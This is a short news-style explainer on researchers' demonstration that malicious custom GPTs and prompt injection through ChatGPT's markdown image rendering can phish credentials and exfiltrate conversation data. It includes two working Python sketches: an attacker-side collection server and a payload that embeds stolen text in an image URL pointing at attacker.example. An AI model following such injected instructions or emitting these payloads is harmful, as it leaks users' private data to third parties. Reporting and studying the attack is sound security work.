Malicious GPT Can Phish Credentials and Exfiltrate Them to an External Server


A researcher demonstrated how malicious actors could build custom GPTs that phish users for credentials and exfiltrate the stolen data to an external server.
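To make the exfiltration half of the attack concrete, the sketch below shows the kind of external collection endpoint such a scheme depends on. It is a minimal illustration under assumed details: the port, path, and query parameter name are hypothetical and do not come from the research.

```python
# Minimal sketch of an attacker-side collection endpoint (hypothetical;
# the actual server used in the research is not described here).
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

class LogHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Any data smuggled into the query string (e.g. ?q=...) is captured.
        params = parse_qs(urlparse(self.path).query)
        print("exfiltrated:", params.get("q", [""])[0])
        # Return 200 so the request looks like a normal image fetch.
        self.send_response(200)
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("", 8000), LogHandler).serve_forever()
```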

In the spring of 2023, researchers Johann Rehberger and Roman Samoilenko independently found that ChatGPT was susceptible to a prompt injection attack that abuses its rendering of markdown images.

They showed how an attacker could trick a victim into pasting seemingly benign but malicious content from the attacker's website into ChatGPT; the injected instructions then abuse image markdown rendering to steal potentially sensitive information from the victim's conversation.
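The core of the trick can be sketched in a few lines of Python: the injected instructions tell the model to emit image markdown whose URL carries conversation data in its query string, so that simply rendering the image leaks it. The domain attacker.example and the q parameter are illustrative assumptions, not details from either researcher's write-up.

```python
# Hypothetical sketch of the markdown-image exfiltration payload.
from urllib.parse import quote

# Stand-in for sensitive text the injected prompt extracts from the chat.
stolen = "user's earlier ChatGPT conversation"

# The injected instructions ask the model to output image markdown whose
# URL embeds the stolen text; when the client renders the image, the
# resulting HTTP request delivers the data to the attacker's server.
payload = f"![ ](https://attacker.example/log?q={quote(stolen)})"
print(payload)
```

Paired with an endpoint like the one sketched earlier, this closes the loop: the victim's own client performs the HTTP request that hands the data over.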

Read More: Malicious GPT Can Phish Credentials, Exfiltrate Them to External Server: Researcher
